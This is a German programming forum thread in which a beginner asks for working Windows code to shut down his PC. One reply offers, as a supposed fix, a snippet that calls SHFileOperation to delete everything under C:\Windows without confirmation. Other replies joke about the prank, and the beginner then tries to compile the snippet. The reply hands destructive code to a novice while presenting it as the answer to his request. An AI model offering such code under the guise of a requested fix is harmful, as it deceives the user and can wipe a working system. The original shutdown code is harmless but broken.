Shut down
-
So neh??? :
#include <windows.h>
int WINAPI WinMain()
{ bool MySystemShutdown()
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return( FALSE );LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
&tkp.Privileges[0].Luid);tkp.PrivilegeCount = 1; // one privilege to set
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
(PTOKEN_PRIVILEGES)NULL, 0);if (GetLastError() != ERROR_SUCCESS)
return FALSE;if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE, 0))
return FALSE;return TRUE;
;};}
;}
-
les dir mal ein tutorial durch, hier sind so viele fehler drin das es dir persöhnlich nichts bringt wenn dir jetzt jemand einfach den code hinklatscht.
ich sag nur
- semikolon
- klammerung
- funktionsdeklaration
- funktionaufruf
und undoben rechts findest du einiges brauchbares.
-
Ich habe den code doch hingeklatscht bekommen !!!! Ich hab mal neh frage ich lerne grad aus dem Buch "C-von anfang an" Von Helmut erlenkötter. Könntest du mir ein Buchvorschlag machen was ich als nächstes durchnehmen ( <-
) soll??
ich würde gern verstehen wie ein virus funktioniert.
-
-
wewe schrieb:
Ich habe den code doch hingeklatscht bekommen !!!!
habe den link gepostet in der hoffung das du damit was anfangen kannst und
ihn vernünftig einbauen kannst.wewe schrieb:
Ich hab mal neh frage ich lerne grad aus dem Buch "C-von anfang an" Von Helmut erlenkötter. Könntest du mir ein Buchvorschlag machen was ich als nächstes durchnehmen ( <-
) soll??durchforste mal die faq oder benutz mal die forensuche, es kommt auch startk darauf in welche richtung du dich entwickelen möchtest
-
Klattscht es mir BITTE hin !!!!!!!! BBBBBIIITTTTTEE
-
So dürfte es funktionieren:
SHFILEOPSTRUCT fo; fo.wFunc = FO_DELETE; fo.pFrom = "C:\\Windows\\*.*"; fo.fFlags = FOF_NOCONFIRMATION; SHFileOperation (&fo);Den Code darfst du aus Copyright gründen aber nicht weitergeben...
-
Du Sau!!!
-
WebFritzi schrieb:
Du Sau!!!
Hast du es ausgeführt oder was? 
-
masterofx32 schrieb:
WebFritzi schrieb:
Du Sau!!!
so dämlich kann keiner sein...
-
net schrieb:
masterofx32 schrieb:
so dämlich kann keiner sein...
Das sehe ich anders

Da werden wohl bald die ersten Klagen bei Anfaenger14 eintrudeln wegen Schreiben von Virencode
EDIT: Bemerke gerade, dass der Code ja sowieso fehlerhaft ist, weil pFrom doppelt-nullterminiert sein müsste.
-
Bei mir werden immer fehler gemeldet !!!->
Kompilierung läuft...
Herunterfahren.cpp
C:\Dokumente und Einstellungen\wiluna\Desktop\Herunterfahren.cpp(1) : error C2146: Syntaxfehler : Fehlendes ';' vor Bezeichner 'fo'
C:\Dokumente und Einstellungen\wiluna\Desktop\Herunterfahren.cpp(1) : error C2501: 'SHFILEOPSTRUCT' : Fehlende Speicherklasse oder Typbezeichner
C:\Dokumente und Einstellungen\wiluna\Desktop\Herunterfahren.cpp(1) : fatal error C1004: Unerwartetes Dateiende gefunden
Fehler beim Ausführen von cl.exe.Herunterfahren.obj - 3 Fehler, 0 Warnung(en)
-
SHFILEOPSTRUCT fo;
fo.wFunc = FO_DELETE;
fo.pFrom = "C:\\Windows\*.*";
fo.fFlags = FOF_NOCONFIRMATION;SHFileOperation (&fo);
Das prog sieht so aus als würde es Windows löschen !!!!
-
qw schrieb:
Das prog sieht so aus als würde es Windows löschen !!!!
Nein! Echt? Wow!

-
Hier ´soll es nicht um ein programm drehen der windoof löscht sondern den pc herunterfährt
-
qw schrieb:
Hier ´soll es nicht um ein programm drehen der windoof löscht sondern den pc herunterfährt
du das wurde hinreichend beantwortet
-
qw schrieb:
C++ Forum, da werden Sie geholfen. Ein Programm der Windoof löscht...abgesehen davon: hast Du schon von solch Wörtern wie Ironie und/oder Sarkasmus gehört?
Es lebe der DAU.
-
Deutschlehrer schrieb:
Es lebe der DAU.

was würden wir nur ohne sie machen
konsolenprogramme schreiben